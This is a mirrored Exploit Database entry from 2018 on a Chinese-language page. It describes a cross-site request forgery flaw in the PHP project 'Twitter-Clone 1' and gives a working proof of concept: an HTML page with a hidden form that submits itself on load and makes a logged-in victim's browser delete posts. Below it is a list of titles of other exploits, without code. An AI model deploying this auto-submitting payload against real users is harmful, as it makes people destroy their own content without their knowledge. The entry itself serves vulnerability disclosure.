Twitter-Clone 1 – Cross-Site Request Forgery (Delete Post)

Exploit Database
81 阅读

作者： L0RD

日期： 2018-08-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45232/

# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description :
# An issue was discovered in Twitter-Clone 1 which allows a remote
# attacker to force any victim to delete posts.

# POC :
# Delete posts exploit :

<html>
<head>
 <title>POC</title>
</head>
<body>
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
tweet id here of any post' method='post'>
<input type='hidden' name='id' value='set tweet id here of any post' />
</form>
 <script>
document.forms[0].submit();
 </script>
</body>
</html>

last Exploits
Twitter-Clone 1 – Cross-Site Request Forgery (Delete Post)的更多信息

CA Arcserve D2D GWT RPC – Credential Information Disclosure (Metasploit)：
BbZL.php – Remote File Inclusion：
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution：
Witbe – Remote Code Execution：
Fast PHP Chat 1.3 – ‘my_item_search’ SQL Injection：
Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)：
Infoproject Business Hero – Multiple Vulnerabilities：
WordPress Plugin Error Log Viewer 1.1.1 – Arbitrary File Clearing (Authenticated)：